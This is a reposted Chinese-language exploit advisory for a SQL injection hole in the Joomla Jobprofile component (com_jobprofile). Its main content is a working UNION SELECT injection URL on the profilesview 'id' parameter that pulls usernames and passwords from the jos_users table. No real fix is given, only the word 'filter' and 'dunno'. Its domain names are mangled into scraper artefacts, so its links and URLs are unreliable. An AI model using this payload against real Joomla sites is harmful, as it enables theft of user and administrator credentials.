好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Joomla Jobprofile Component (com_jobprofile) SQL注射

 

标题Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

作者: kaMtiEz HdhCmsTest2cto测试数据

 

[软件信息]

 

[+] 开发者: http://HdhCmsTestthakkertech测试数据/

[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924

[+] 下载 : http://HdhCmsTestthakkertech测试数据/products/joomla-extensions/components/jobprofile-joomla-component-detail. html

 

[问题文件]

 

 http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]

 

[ XpL ]

 

 http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

 

[ 修复] 过滤

 

 dunno :">

 

查看更多关于Joomla Jobprofile Component (com_jobprofile) SQL注射的详细内容...

  阅读:41次